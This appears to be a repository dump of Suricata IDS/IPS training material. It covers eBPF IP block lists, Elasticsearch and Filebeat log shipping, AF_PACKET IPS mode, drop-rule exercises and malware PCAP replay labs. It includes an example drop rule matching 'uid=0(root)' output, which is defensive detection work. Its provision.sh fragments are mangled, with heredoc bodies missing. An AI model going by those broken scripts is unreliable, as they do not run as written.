However, do not clone the entire Linux source repository as instructed in its readme. It is big. An unpacked kernel tarball is already prepared in `/data`. 63 | 64 | ## Usage 65 | 66 | ### Setting things up 67 | 68 | Find an IP address you can communicate with on the primary vagrant box interface and add it to the block list 69 | with `bpfctrl`. 70 | 71 | The syntax is `bpfctrl -m /sys/fs/bpf/suricata-wlp4s0-ipv4_drop ipv4 --add 1.2.3.4=1` where `1.2.3.4` is the IP to add, and `bpfctrl -m /sys/fs/bpf/suricata-wlp4s0-ipv4_drop ipv4 --remove 1.2.3.4` to remove it. 72 | 73 | Once done, verify that no traffic is seen anymore for this IP address. 74 | 75 | One can use `suricatasc` to get interface statistics and/or analyze the eve.json output 76 | for significant events. 77 | 78 | ### Invert the logic 79 | 80 | Update `filter.c` to get a pass list instead of a block list. Test it by checking that traffic really 81 | starts when IPs are added.
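A minimal way to sanity-check the behaviour (a sketch only; the pinned map path, interface and address below are assumptions based on the `enp0s8` af-packet example above, adjust them to your setup):

```
# raw packets stay visible to tcpdump regardless of the eBPF filter
sudo tcpdump -ni enp0s8 host 192.168.56.1

# add the test host to the list backing the pinned map, then watch
# Suricata interface counters and eve.json to see whether its flows appear
sudo bpfctrl -m /sys/fs/bpf/suricata-enp0s8-ipv4_drop ipv4 --add 192.168.56.1=1
sudo suricatasc -c "iface-stat enp0s8"
```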
81 | 82 | ### Add some more logic 83 | 84 | Update `filter.c` to only accept traffic on port 22 for the IP addresses in the pass list. 85 | 86 | --- 87 | 88 | [back](/Suricata) 89 | 90 | -------------------------------------------------------------------------------- /Suricata/elastic-cluster/README.md: -------------------------------------------------------------------------------- 1 | # Clustered elasticsearch 2 | 3 | Elastic config options are in `elasticsearch.yml`. It should be placed under `/etc/elasticsearch` if installed from deb packages, or bound under `/usr/share/elasticsearch/config/elasticsearch.yml` if running from docker images. Also, make sure that each node is bound to a distinct port on the host if running from a container. 4 | 5 | ``` 6 | touch $PWD/elasticsearch.yml 7 | docker run \ 8 | -ti \ 9 | --rm \ 10 | -p 9200:9200 \ 11 | -p 9300:9300 \ 12 | -v $PWD/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml \ 13 | -e "ES_JAVA_OPTS=-Xms512m -Xmx512m" \ 14 | docker.elastic.co/elasticsearch/elasticsearch-oss:7.6.0 15 | ``` 16 | 17 | Firstly, all nodes should be configured to belong to a common cluster. 18 | 19 | ``` 20 | cluster.name: josephine 21 | ``` 22 | 23 | Alternatively, any supported elastic config option can be passed to the container via environment variables. 24 | 25 | ``` 26 | docker run \ 27 | -ti \ 28 | --rm \ 29 | -p 9200:9200 \ 30 | -p 9300:9300 \ 31 | -e "ES_JAVA_OPTS=-Xms512m -Xmx512m" \ 32 | -e "cluster.name=josephine" \ 33 | docker.elastic.co/elasticsearch/elasticsearch-oss:7.6.0 34 | ``` 35 | 36 | Each node can be configured for a variety of roles. A single node can fulfill many roles, though specialized workers are common in production. 37 | * `master` is responsible for coordinating other cluster nodes, or stays in standby mode in case the main master fails; 38 | * `data` nodes store data on disk and function as indexing and search workers; 39 | * `ingest` nodes run pipeline jobs before indexing the data, and essentially function as logstash integrated into elastic; 40 | 41 | ``` 42 | node: 43 | name: firstnode 44 | data: false 45 | ingest: false 46 | master: false 47 | ``` 48 | 49 | Note that the node name is arbitrary and simply has to be unique. It will be automatically generated if left unconfigured. There is another role that is not classified as such. Elastic uses a binary connection for intra-cluster communication and HTTP for talking to the world. A common practice is to create specialized *no-data* or *proxy* nodes that are configured with all roles disabled and http enabled. The role of these nodes is simply to collect JSON bulks and forward them to worker nodes over the binary protocol. Workers usually have http disabled or simply bound to localhost. **Please flush your container or data directory if you change the node name. Otherwise artifacts from the last run may conflict with the new config.** 50 | 51 | Binding elastic to specific interfaces can be a good idea if your box has multiple interfaces. Elastic is not terribly intelligent at picking the right interface automatically, and it can cause confusion. 52 | 53 | ``` 54 | network: 55 | host: 0.0.0.0 56 | ``` 57 | 58 | Docker nodes are located inside a docker private network, thus you either need to use the `--network host` flag when creating a container, which binds the container to the host network stack and bypasses docker networking entirely (do not do this in production), or you can alter the `network.publish_host` parameter in elasticsearch.
59 | 60 | ``` 61 | network: 62 | host: 0.0.0.0 63 | publish_host: ACCESSIBLE_IP_OR_ADDRESS 64 | ``` 65 | 66 | HTTP listener can be configured separately. 67 | 68 | ``` 69 | http: 70 | host: 0.0.0.0 71 | ``` 72 | 73 | Older elastic version (before 7) simply required **some master-eligible** nodes to be listied for unicast ping. Nodes would then autonegotiate cluster settings after this ping is successful. 74 | 75 | ``` 76 | discovery: 77 | zen: 78 | ping: 79 | unicast: 80 | hosts: 81 | - 192.168.56.120 82 | - 192.168.56.82 83 | - 192.168.56.122 84 | ``` 85 | 86 | [Version 7 changed the syntax and added more fine-graining options.](https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-discovery-hosts-providers.html) New syntax is `discovery.seed_hosts`. Note that port suffix corresponds to **binary transport** port, which defaults to `9300` (but can be changed). 87 | 88 | ``` 89 | discovery.seed_hosts: 90 | - 192.168.56.120:9300 91 | - 192.168.56.11 92 | ``` 93 | 94 | Furthermore, we now need to define an initial list of **master-eligible nodes** when bootstrapping a new cluster. Otherwise, you will be greeted by an error like this - 95 | 96 | ``` 97 | "message": "master not discovered yet, this node has not previously joined a bootstrapped (v7+) cluster, and [cluster.initial_master_nodes] is empty on this node 98 | ``` 99 | 100 | To fix this, you need a list of potential master **node names** (not network addresses) in configuration. In other words, names in this list must correspond to `node.name` value for each listed master node. 101 | 102 | ``` 103 | cluster.initial_master_nodes: 104 | - firstnode 105 | - secondnode 106 | ``` 107 | 108 | Then verify that nodes are listed with proper roles via `_cat` API. 109 | 110 | ``` 111 | curl PROXY:PORT/_cat/nodes 112 | ``` 113 | 114 | ## Shard allocation and cluster API 115 | 116 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-allocation-filtering.html 117 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/disk-allocator.html 118 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/cluster-update-settings.html 119 | * https://www.elastic.co/guide/en/elasticsearch/reference/current/shards-allocation.html 120 | * https://gist.github.com/markuskont/734a9ec946bf40801494f14b368a0668 121 | 122 | Suppose our elastic cluster is distributed across multiple racks or datacenters. We can define custom attributes for each node. For example, we could configure `node.attr.datacenter: $NAME` or `node.attr.rack_id: $NAME`. Note that both `datacenter` and `rack_id` are totally custom attributes added by us. We could also create attribute `purpose` with values `hot`, `cold`, `archive`, and configure all new indices to be created on `hot` nodes. 123 | 124 | Then we can make our cluster aware of those settings (**only needs to be done once per cluster**). 125 | 126 | ``` 127 | curl -XPUT -ss -H'Content-Type: application/json' "localhost:9200/_cluster/settings" -d '{ 128 | "transient" : { 129 | "cluster.routing.allocation.awareness.attributes": "datacenter" 130 | } 131 | }' 132 | ``` 133 | 134 | Once done, our replicas should then be distributed over datacenters. 
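To see how the allocation awareness actually played out, the `_cat` API can be queried again (a small sketch, assuming the cluster answers on `localhost:9200`):

```
# list every node together with its custom attributes
curl -ss localhost:9200/_cat/nodeattrs?v
# show which node each primary and replica shard ended up on
curl -ss "localhost:9200/_cat/shards?v&h=index,shard,prirep,state,node"
```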
135 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/000-bulk-intro.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "Install requried modules with `pip`.\n", 8 | "\n", 9 | "```\n", 10 | "python3 -m pip install --user --upgrade elasticsearch\n", 11 | "```" 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 1, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "from elasticsearch import Elasticsearch" 21 | ] 22 | }, 23 | { 24 | "cell_type": "markdown", 25 | "metadata": {}, 26 | "source": [ 27 | "Connect to local instance" 28 | ] 29 | }, 30 | { 31 | "cell_type": "code", 32 | "execution_count": 2, 33 | "metadata": {}, 34 | "outputs": [], 35 | "source": [ 36 | "conn = Elasticsearch(hosts=[\"localhost:9200\"])" 37 | ] 38 | }, 39 | { 40 | "cell_type": "markdown", 41 | "metadata": {}, 42 | "source": [ 43 | "Object creation does not verify that server is up. Validate it!" 44 | ] 45 | }, 46 | { 47 | "cell_type": "code", 48 | "execution_count": 3, 49 | "metadata": {}, 50 | "outputs": [ 51 | { 52 | "data": { 53 | "text/plain": [ 54 | "True" 55 | ] 56 | }, 57 | "execution_count": 3, 58 | "metadata": {}, 59 | "output_type": "execute_result" 60 | } 61 | ], 62 | "source": [ 63 | "conn.ping()" 64 | ] 65 | }, 66 | { 67 | "cell_type": "markdown", 68 | "metadata": {}, 69 | "source": [ 70 | "Elasticsearch uses HTTP and transport protocol, so indexing individual documents is fairly expensive. Especially when talking about IDS logs. Proper way is to use bulk API.\n", 71 | "\n", 72 | "See:\n", 73 | "\n", 74 | "https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-bulk.html\n", 75 | "\n", 76 | "Bulk format requires metadata line before each document to indicate what action should be taken, which index used, etc. **Index name must be lowercase**." 77 | ] 78 | }, 79 | { 80 | "cell_type": "code", 81 | "execution_count": 4, 82 | "metadata": {}, 83 | "outputs": [], 84 | "source": [ 85 | "bulk = []\n", 86 | "i = 0\n", 87 | "for i in range(100):\n", 88 | " meta = {\n", 89 | " \"index\": {\n", 90 | " \"_index\": \"mynewindex\",\n", 91 | " \"_id\": i\n", 92 | " }\n", 93 | " }\n", 94 | " doc = {\n", 95 | " \"message\": \"this is message {}\".format(i),\n", 96 | " \"count\": i\n", 97 | " }\n", 98 | " \n", 99 | " bulk.append(meta)\n", 100 | " bulk.append(doc)" 101 | ] 102 | }, 103 | { 104 | "cell_type": "code", 105 | "execution_count": 5, 106 | "metadata": {}, 107 | "outputs": [ 108 | { 109 | "name": "stdout", 110 | "output_type": "stream", 111 | "text": [ 112 | "200\n" 113 | ] 114 | } 115 | ], 116 | "source": [ 117 | "print(len(bulk))" 118 | ] 119 | }, 120 | { 121 | "cell_type": "markdown", 122 | "metadata": {}, 123 | "source": [ 124 | "Then ship it!" 
125 | ] 126 | }, 127 | { 128 | "cell_type": "code", 129 | "execution_count": 6, 130 | "metadata": {}, 131 | "outputs": [ 132 | { 133 | "name": "stdout", 134 | "output_type": "stream", 135 | "text": [ 136 | "dict_keys(['took', 'errors', 'items'])\n" 137 | ] 138 | } 139 | ], 140 | "source": [ 141 | "resp = conn.bulk(bulk)\n", 142 | "print(resp.keys())" 143 | ] 144 | }, 145 | { 146 | "cell_type": "markdown", 147 | "metadata": {}, 148 | "source": [ 149 | "And verify on CLI.\n", 150 | "\n", 151 | "```\n", 152 | "curl localhost:9200/myNewIndex/_search\n", 153 | "```" 154 | ] 155 | } 156 | ], 157 | "metadata": { 158 | "kernelspec": { 159 | "display_name": "Python 3", 160 | "language": "python", 161 | "name": "python3" 162 | }, 163 | "language_info": { 164 | "codemirror_mode": { 165 | "name": "ipython", 166 | "version": 3 167 | }, 168 | "file_extension": ".py", 169 | "mimetype": "text/x-python", 170 | "name": "python", 171 | "nbconvert_exporter": "python", 172 | "pygments_lexer": "ipython3", 173 | "version": "3.9.1" 174 | } 175 | }, 176 | "nbformat": 4, 177 | "nbformat_minor": 4 178 | } 179 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/README.md: -------------------------------------------------------------------------------- 1 | # Shipping Suricata logs to Elasticsearch 2 | 3 | This section assumes that student is familiar with: 4 | * Suricata on CLI, configuring it, using rulesets and parsing or replaying PCAP files; 5 | * Getting Elastic up and running with docker, interacting with `/_cat` and `_search` API endpoints; 6 | 7 | * https://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html#output-types 8 | 9 | This section assumes that student can produce EVE JSON messages with Suricata and is familiar with basic Elastic setup. 10 | 11 | * [Previous section](/Suricata/elastic) explained how Elastic works on high level and how to insert documents individually; 12 | * however, this is very inefficient as every EVE message would be a separate HTTP request; 13 | * that's suicide; 14 | * solution - clump a batch of messages and send a single big request; 15 | * Elastic has `_bulk` API endpoint to pick them up; 16 | * 1000 or 10000 elements per bulk is not uncommon; 17 | * Many methods exist to ship EVE into Elastic; 18 | * Up to your setup whatever works for you; 19 | * But, fundamentally, they all interact with `_bulk`; 20 | * So, basic understanding about how it works will be useful if things go wrong; 21 | * (and they most definitely will); 22 | 23 | ## Bulk API 24 | 25 | * [basics](/Suricata/elastic-log-shipping/000-bulk-intro.ipynb) 26 | * [shipping EVE](/Suricata/elastic-log-shipping/000-bulk-eve.ipynb) 27 | 28 | ## Filebeat 29 | 30 | * https://www.elastic.co/downloads/beats/filebeat-oss 31 | 32 | Beats family is a very popular choice for client-side log shipping nowadays. It's a Go binary, so it does not have any external dependencies. Any compatible OS architecture should be able to execute the compiled binary. That's nice, because it also means we don't need containers to keep dependencies in check. Most simple setup is to download the package and run it! 33 | 34 | **Mind the version, it must be the same as Elasticsearch you are already running**. 
35 | 36 | ``` 37 | wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-oss-7.10.2-linux-x86_64.tar.gz 38 | tar -xzf filebeat-oss-7.10.2-linux-x86_64.tar.gz 39 | cd filebeat-7.10.2-linux-x86_64/ 40 | ls -lah 41 | ``` 42 | 43 | You should see something like this. 44 | 45 | ``` 46 | total 69M 47 | drwxr-xr-x 5 root root 4.0K Jan 22 10:02 . 48 | drwx------ 6 root root 4.0K Jan 22 10:02 .. 49 | -rw-r--r-- 1 root root 41 Jan 12 22:13 .build_hash.txt 50 | -rw-r--r-- 1 root root 291K Jan 12 22:10 fields.yml 51 | -rwxr-xr-x 1 root root 61M Jan 12 22:12 filebeat 52 | -rw-r--r-- 1 root root 90K Jan 12 22:10 filebeat.reference.yml 53 | -rw------- 1 root root 9.8K Jan 12 22:10 filebeat.yml 54 | drwxr-xr-x 3 root root 4.0K Jan 12 22:10 kibana 55 | -rw-r--r-- 1 root root 12K Jan 12 21:58 LICENSE.txt 56 | drwxr-xr-x 22 root root 4.0K Jan 12 22:10 module 57 | drwxr-xr-x 2 root root 4.0K Jan 12 22:10 modules.d 58 | -rw-r--r-- 1 root root 8.2M Jan 12 22:00 NOTICE.txt 59 | -rw-r--r-- 1 root root 814 Jan 12 22:13 README.md 60 | ``` 61 | 62 | And then explore the built-in help dialog for filebeat. 63 | 64 | ``` 65 | ./filebeat --help 66 | ./filebeat run --help 67 | ``` 68 | 69 | Filebeat uses subcommands, as many CLI applications do. Main one being `run`. While you can override config options on command line, a better option is to use `-c` to point it toward a custom config file. Example skeletons are already in the folder, **but they are not enough**. 70 | 71 | Filebeat must be configured to: 72 | * load your EVE JSON file, *where ever you decided to store it*; 73 | * parse each message for JSON data, store that decoded JSON in elastic message root; 74 | * parse message timestamp to get `@timestamp` logstash-style field, many frontend tools assume it to be there and can break silently if it's not; 75 | * output stream should be pointed **toward your elastic instance**; 76 | * choose the index you want to store the data; 77 | 78 | Other options are simply nice improvements and demonstration. For example, redefining template patterns, disabling it if you want, customizing elastic index pattern, helpful filebeat logging, etc. 79 | 80 | ``` 81 | filebeat.inputs: 82 | - type: log 83 | paths: 84 | - "/var/log/suricata/eve.json" 85 | json.keys_under_root: true 86 | json.add_error_key: true 87 | 88 | processors: 89 | - timestamp: 90 | field: timestamp 91 | layouts: 92 | - '2006-01-02T15:04:05.999999Z0700' 93 | - '2006-01-02T15:04:05Z' 94 | - '2006-01-02T15:04:05.999Z' 95 | test: 96 | - '2020-03-12T21:36:17.712650+0200' 97 | - '2019-06-22T16:33:51Z' 98 | - '2019-11-18T04:59:51.123Z' 99 | 100 | output.elasticsearch: 101 | hosts: ["localhost:9200"] 102 | index: "filebeat-%{+yyyy.MM.dd}" 103 | bulk_max_size: 10000 104 | 105 | logging.level: info 106 | logging.to_files: true 107 | logging.files: 108 | path: /var/log/filebeat 109 | name: filebeat 110 | keepfiles: 7 111 | permissions: 0644 112 | 113 | setup.template: 114 | name: 'filebeat' 115 | pattern: 'filebeat-*' 116 | enabled: false 117 | ``` 118 | 119 | **Note that this configuration also disables template management.** It assumes ECS patterns (more on that later) which we are not using. It does not configure dual-mapping that is assumed by many front-end tools, and thus breaks them. Alas, many frontend tools are accustomed to Logstash default configurations and have adopted them as requirements. 120 | 121 | This mapping is in `fields.yml` file that could be customized, or reconfigured. But it's easier to set the template manually. 
Following command will set a template that is derived from logstash default dual-mapping setup. 122 | 123 | ``` 124 | curl -XPUT localhost:9200/_template/logstash -H 'Content-Type: application/json' -d '{"order": 0, "version": 0, "index_patterns": ["logstash-*", "events-*", "suricata-*", "filebeat-*"], "settings": {"index": {"number_of_shards": 3, "number_of_replicas": 0, "refresh_interval": "5s"}}, "mappings": {"dynamic_templates": [{"message_field": {"path_match": "message", "mapping": {"norms": false, "type": "text"}, "match_mapping_type": "string"}}, {"string_fields": {"mapping": {"norms": false, "type": "text", "fields": {"keyword": {"type": "keyword"}}}, "match_mapping_type": "string", "match": "*"}}], "properties": {"@timestamp": {"type": "date", "format": "strict_date_optional_time||epoch_millis||date_time"}, "@version": {"type": "keyword"}, "ip": {"type": "ip"}}}, "aliases": {}}' 125 | ' 126 | ``` 127 | 128 | Assuming you have this config **customized to your environment** in `config.yml`, use the `run` command. 129 | 130 | ``` 131 | ./filebeat run -c config.yml 132 | ``` 133 | 134 | Assuming you kept the default `filebeat` index pattern and are running local docker Elastic on a VM, then verify that you have logs in elastic. **If not, go back to config bulletpoints and verify that you customized each item correctly**. 135 | 136 | ``` 137 | curl localhost:9200/filebeat-*/_search 138 | ``` 139 | 140 | ### Word about ECS 141 | 142 | Elastic Common Schema tries to address a simple issue - Elastic has no schema. This makes it great for *"let's collect everything and figure out what we need later"* role, but leads to way too many fields that are inconsistent across data sources, too many fields types to manage, mapping collisions, key inconsistencies while doing lookups, and too much JSON verbosity. 143 | 144 | ECS is a taxonomy that tackles those problems by...making more fields. Not much is left of original message structure and a ton of metadata is added as well. That metadata has limited use outside Elastic product stack. 145 | 146 | Filebeat has Suricata plugin for doing that, but this is not maintained by Suricata developers. Our course focuses only on core EVE, as that already has over 1000 possible fields depending on configuration. 147 | 148 | ### Docker setup 149 | 150 | For hipster cred, here's filebeat docker setup. However, doing this overkill for this exercise. 
151 | 152 | ``` 153 | docker run -dit --name filebeat -h filebeat -v /var/log/suricata:/var/log/suricata:ro -v /var/log/filebeat:/var/log/filebeat:rw -v /etc/filebeat.yml:/etc/filebeat.yml docker.elastic.co/beats/filebeat-oss:${ELASTIC_VERSION} run -c /etc/filebeat.yml 154 | ``` 155 | -------------------------------------------------------------------------------- /Suricata/elastic-log-shipping/syslog.md: -------------------------------------------------------------------------------- 1 | # Syslog 2 | 3 | ## Common Event Expression 4 | 5 | * https://cee.mitre.org/ 6 | * http://www.rsyslog.com/tag/cee-enhanced/ 7 | 8 | ### Log format 9 | 10 | ``` 11 | Feb 25 11:23:42 suricata suricata[26526]: @cee: {"timestamp":"2015-12-07T19:30:54.863188+0000","flow_id":139635731853600,"pcap_cnt":142,"event_type":"alert","src_ip":"192.168.11.11","src_port":59523,"dest_ip":"192.168.12.12","dest_port":443,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2013926,"rev":8,"signature":"ET POLICY HTTP traffic on port 443 (POST)","category":"Potentially Bad Traffic","severity":2}} 12 | ``` 13 | 14 | ### Suricata configuration 15 | 16 | ``` 17 | grep cee -B2 -A3 /etc/suricata/suricata.yaml 18 | ``` 19 | 20 | ## Rsyslog 21 | 22 | * http://www.rsyslog.com/ubuntu-repository/ 23 | * http://www.rsyslog.com/tag/mmjsonparse/ 24 | * http://www.rsyslog.com/doc/mmjsonparse.html 25 | * http://www.rsyslog.com/doc/v8-stable/configuration/modules/omelasticsearch.html 26 | 27 | ``` 28 | apt-cache policy rsyslog 29 | rsyslog: 30 | Installed: 7.4.4-1ubuntu2.6 31 | Candidate: 8.16.0-0adiscon1trusty1 32 | Version table: 33 | 8.16.0-0adiscon1trusty1 0 34 | 500 http://ppa.launchpad.net/adiscon/v8-stable/ubuntu/ trusty/main amd64 Packages 35 | *** 7.4.4-1ubuntu2.6 0 36 | 500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 Packages 37 | 100 /var/lib/dpkg/status 38 | ``` 39 | 40 | ### Installing missing modules 41 | 42 | ``` 43 | sudo apt-get install rsyslog-mmjsonparse rsyslog-elasticsearch -y 44 | ``` 45 | 46 | ``` 47 | sudo service rsyslog restart 48 | ``` 49 | 50 | ### Verify daemon 51 | 52 | ``` 53 | grep rsyslogd /var/log/syslog 54 | ``` 55 | 56 | ### Client-server 57 | 58 | #### client 59 | 60 | ``` 61 | echo "*.* @192.168.10.20:514" >> /etc/rsyslog.d/udp-client.conf 62 | systemctl restart rsyslog.service 63 | ``` 64 | 65 | #### server 66 | 67 | ``` 68 | cat > /etc/rsyslog.d/udp-server.conf < `Index Patterns`. This will allow you to use `Discover` and `Visualize` tabs. 60 | -------------------------------------------------------------------------------- /Suricata/ips/README.md: -------------------------------------------------------------------------------- 1 | # Suricata as an IPS 2 | 3 | > Maybe it is better to just drop the bad stuff? 4 | 5 | see: 6 | * https://github.com/StamusNetworks/SELKS/wiki/Initial-Setup---Suricata-IPS 7 | * https://home.regit.org/2012/09/new-af_packet-ips-mode-in-suricata/ 8 | * https://github.com/OISF/suricata/commit/662dccd8a5180807e3749842508b80e2e2183051 9 | 10 | ## IPS 11 | Suricata can effectively be used as an IPS. Traditionally, a firewall (e.g., netfilter or ipfw) has been used for achieving this functionality. However, this does not always perform very well. 12 | 13 | 14 | Since 2012, you could also use Suricata to bridge two network interfaces using the AF_PACKET ips mode. All packets received from one interface are sent to the other interface, unless a signature with the drop (or reject) keyword fires on the packet.
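For reference, a drop rule is just a regular rule with the action changed. A hedged example with a made-up message and sid, not taken from any ruleset:

```
drop http any any -> $HOME_NET any (msg:"EXAMPLE drop suspicious HTTP response"; flow:established,to_client; content:"uid=0(root)"; sid:9000001; rev:1;)
```

With `copy-mode: ips` (explained below), a match on such a rule means the packet is simply not copied to the peer interface.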
15 | 16 | 17 | The copy-mode variable can take the following values: 18 | 19 | * ips: the drop keyword is honored and matching packets are dropped. 20 | * tap: no drop occurs, Suricata acts as a bridge 21 | 22 | 23 | ### sample conf: 24 | ``` 25 | af-packet: 26 | - interface: eth0 27 | threads: 1 28 | defrag: yes 29 | cluster-type: cluster_flow 30 | cluster-id: 98 31 | copy-mode: ips 32 | copy-iface: eth1 33 | buffer-size: 64535 34 | use-mmap: yes 35 | - interface: eth1 36 | threads: 1 37 | cluster-id: 97 38 | defrag: yes 39 | cluster-type: cluster_flow 40 | copy-mode: ips 41 | copy-iface: eth0 42 | buffer-size: 64535 43 | use-mmap: yes 44 | ``` 45 | 46 | ### Remember 47 | 48 | * This mode is dependent on the zero copy mode of AF_PACKET. You need to set use-mmap to yes on both interfaces; 49 | * MTU on both interfaces have to be equal; 50 | * Set different values of cluster-id on both interfaces to avoid conflict; 51 | * Stream engine must be set into inline mode, that way the engine will keep a session in memory until drop/accept has been decided; 52 | 53 | # virtualbox routed setup 54 | 55 | ## set up static routes on client and server 56 | 57 | * client should be routed to server and vice versa, via the bridge machine 58 | * https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-networkscripts-static-routes 59 | * please disable the first network interface on client machine manually! 60 | 61 | ``` 62 | ip route add default via 192.168.12.254 63 | ip route add 192.168.11.0/24 via 192.168.12.254 dev 64 | ``` 65 | ``` 66 | ip route show 67 | ``` 68 | 69 | ## set up suricata ips on bridge machine 70 | 71 | * [suricata will handle packet copy between interfaces, no iptables nor ip_forward setup is needed](/Suricata/suricata/ips-intro.md) 72 | 73 | ### use tcpdump on bridge machine to debug 74 | ``` 75 | vagrant ssh bridge 76 | tcpdump -i enpXXX port 80 77 | ``` 78 | -------------------------------------------------------------------------------- /Suricata/ips/exercises.md: -------------------------------------------------------------------------------- 1 | # create suricata drop rules 2 | 3 | * Drop DNS queries for facebook 4 | * Drop HTTP traffic on non-standard ports (e.g., HTTP on port 53) 5 | * Use test examples below, drop only initial GET response from `home_net -> external` 6 | * Drop all HTTP GET requests directed at `detectportal.firefox.com` 7 | 8 | ## tips for testing 9 | 10 | ### use docker containers on host 11 | 12 | ``` 13 | docker run --rm -i --name apache-on-dns-port -p 53:80 -v "$PWD":/usr/local/apache2/htdocs/ httpd 14 | sudo docker run --rm -ti -p 53:53/tcp -p 53:53/udp --cap-add=NET_ADMIN andyshinn/dnsmasq 15 | ``` 16 | 17 | ### then test from client box 18 | 19 | ``` 20 | curl 192.168.10.1:53 21 | dig A facebook.com @192.168.10.1 -p 53 22 | ``` 23 | -------------------------------------------------------------------------------- /Suricata/live/README.md: -------------------------------------------------------------------------------- 1 | # Live capture 2 | 3 | Reading static PCAPs on disk is nice for testing or forensics, but goal is to run Suricata online. To see bad stuff as soon as it happens. 4 | 5 | ## AF-packet 6 | 7 | On Linux, Suricata uses a kernel interface called `af-packet` to inspect packets without much overhead. On BSD `netmap` fills the same role. 8 | 9 | Note that superuser privileges are needed for writing to interface. 
10 | 11 | ``` 12 | sudo suricata --af-packet=$INTERFACE -l logs/ 13 | tail -f logs/eve.json 14 | ``` 15 | 16 | ## Replay 17 | 18 | We can use `tcpreplay` to simulate online environment. Packets can be read from offline PCAP files and written to NIC-s. 19 | 20 | ``` 21 | sudo tcpreplay -i $INTERFACE $PCAP 22 | ``` 23 | 24 | You can also control many aspects of replay. For example, to replay with specific rate, or to loop the replay. 25 | 26 | ``` 27 | sudo tcpreplay --pps=100 --loop=3 -i $INTERFACE $PCAP 28 | ``` 29 | 30 | For exercise or lab setup, you can create a *virtual nic pair* that simulates capture interface. Packets written to one interface can be read from another, just like mirror ports in real life. 31 | 32 | ``` 33 | ip link add capture0 type veth peer name replay0 34 | ``` 35 | 36 | Don't forget to active both endpoints. 37 | 38 | ``` 39 | ip link set capture0 up 40 | ip link set replay0 up 41 | ``` 42 | 43 | Sometimes you might run into packet truncation or size mismatch errors. That's because MTU of box that catured the PCAP was likely higher than default 1512. But you can just configure your capture interfaces for jumbo frames. 44 | 45 | ``` 46 | ip link set dev capture0 mtu 9000 47 | ip link set dev replay0 mtu 9000 48 | ``` 49 | 50 | Packet sizes can vary. Smaller will pass as-is, the MTU config is mainly to ensure that jumbo packets are not truncated. 51 | 52 | Then start the replay. 53 | 54 | ``` 55 | sudo tcpreplay -i replay0 $PCAP 56 | ``` 57 | 58 | `tcpdump` can be used to verify raw packets. 59 | 60 | ``` 61 | sudo tcpdump -n -i capture0 62 | ``` 63 | 64 | Then start Suricata listener 65 | 66 | ``` 67 | sudo suricata --af-packet=capture0 -l logs/ 68 | tail -f logs/eve.json 69 | ``` 70 | 71 | ### Dummy NIC 72 | 73 | Same can be achieved with a single dummy NIC. 74 | 75 | ``` 76 | ip link add tppdummy0 type dummy 77 | ip link set tppdummy0 up 78 | ip link set dev tppdummy0 mtu 9000 79 | ``` 80 | 81 | ## Tasks 82 | 83 | * Select 3 malware PCAP samples; 84 | * Create a virtual NIC pair for each pcap; 85 | * Start a separate suricata capture process for each PCAP replay; 86 | -------------------------------------------------------------------------------- /Suricata/lua/provision.sh: -------------------------------------------------------------------------------- 1 | FILE=/etc/sysctl.conf 2 | grep "disable_ipv6" $FILE || cat >> $FILE <> $FILE < /dev/null 2>&1 \ 19 | && apt-get update > /dev/null \ 20 | && apt-get install -y suricata > /dev/null 21 | 22 | systemctl stop suricata.service 23 | systemctl disable suricata.service 24 | 25 | echo "Adding detects for SURICATA" 26 | FILE=/etc/suricata/cdmcs-detect.yaml 27 | grep "CDMCS" $FILE || cat >> $FILE <> $FILE < et-open/combined.rules 33 | ``` 34 | 35 | ## Reloading rules via unix-socket 36 | 37 | Suricata rule database can be updated without system restart, but this requires `unix-command` to be enabled in `suricata.yaml`. Note that this should be enabled by default, so current section does not require user to set it up. 38 | 39 | ``` 40 | unix-command: 41 | enabled: auto 42 | #filename: custom.socket 43 | ``` 44 | 45 | You can use `suricatasc` utility to connect to Unix Socket. **Suricata must be running in online mode**. And use `sudo` as needed. 46 | 47 | ``` 48 | suricatasc 49 | ``` 50 | 51 | If all goes well, then you should see the following help message once connected. More specifically, we are interested in `reload-rules` command. 
52 | 53 | ``` 54 | Command list: shutdown, command-list, help, version, uptime, running-mode, capture-mode, conf-get, dump-counters, reload-rules, ruleset-reload-rules, ruleset-reload-nonblocking, ruleset-reload-time, ruleset-stats, ruleset-failed-rules, register-tenant-handler, unregister-tenant-handler, register-tenant, reload-tenant, unregister-tenant, add-hostbit, remove-hostbit, list-hostbit, reopen-log-files, memcap-set, memcap-show, memcap-list, dataset-add, dataset-remove, iface-stat, iface-list, iface-bypassed-stat, ebpf-bypassed-stat, quit 55 | ``` 56 | 57 | Make sure you have read permissions for socket, or just use `sudo` as needed. 58 | 59 | ``` 60 | suricatasc -c "reload-rules" 61 | ``` 62 | 63 | Then add update command with reload to periodic cron task. 64 | 65 | ## Show and tell 66 | 67 | * [See the attached notebook](/Suricata/rulesets/000-explore-rulesets.ipynb) 68 | 69 | Demo session for exploring rulesets with a Jupyter notebook. For showing how rulesets are structured, how many rules there are, how rules are usually written by professionals. Not meant to be a hands-on session for students. 70 | 71 | ``` 72 | python3 -m pip install --user --upgrade jupyter jupyterlab pandas numpy idstools 73 | export PATH="$HOME/.local/bin:$PATH" 74 | ``` 75 | -------------------------------------------------------------------------------- /Suricata/selks/README.md: -------------------------------------------------------------------------------- 1 | # SELKS 2 | 3 | ## On docker 4 | 5 | Simply clone the SELKS public repository. 6 | 7 | ``` 8 | git clone https://github.com/StamusNetworks/SELKS.git 9 | ``` 10 | 11 | Enter the docker folder. 12 | 13 | ``` 14 | cd SELKS/docker 15 | ``` 16 | 17 | Use 